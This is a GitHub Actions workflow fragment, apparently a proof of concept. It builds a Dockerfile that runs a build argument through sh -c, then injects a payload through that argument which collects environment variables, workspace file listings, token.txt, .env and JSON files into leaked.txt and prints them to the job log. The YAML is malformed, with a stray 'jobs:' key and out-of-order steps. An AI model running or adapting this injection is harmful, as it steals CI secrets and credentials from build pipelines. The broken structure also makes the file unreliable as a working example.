      - name: Create malicious Dockerfile
        run: |
          echo 'FROM python:3.11-alpine
          ARG PYTHON_VERSION
          RUN echo "Running injected command..." && sh -c "$PYTHON_VERSION"' > Dockerfile
          jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Run vulnerable Docker build with injected payload
        run: |
          docker build . --build-arg PYTHON_VERSION="mkdir -p /github/workspace;
            echo '--- ENV VARS ---' > /github/workspace/leaked.txt;
            env >> /github/workspace/leaked.txt;
            echo '--- FILES ---' >> /github/workspace/leaked.txt;
            find /github/workspace >> /github/workspace/leaked.txt;
            echo '--- token.txt ---' >> /github/workspace/leaked.txt;
            cat /github/workspace/token.txt >> /github/workspace/leaked.txt 2>/dev/null;
            echo '--- .env ---' >> /github/workspace/leaked.txt;
            cat /github/workspace/.env >> /github/workspace/leaked.txt 2>/dev/null;
            echo '--- *.json ---' >> /github/workspace/leaked.txt;
            cat /github/workspace/*.json >> /github/workspace/leaked.txt 2>/dev/null"
      
      - name: Print leaked secrets
        run: cat leaked.txt
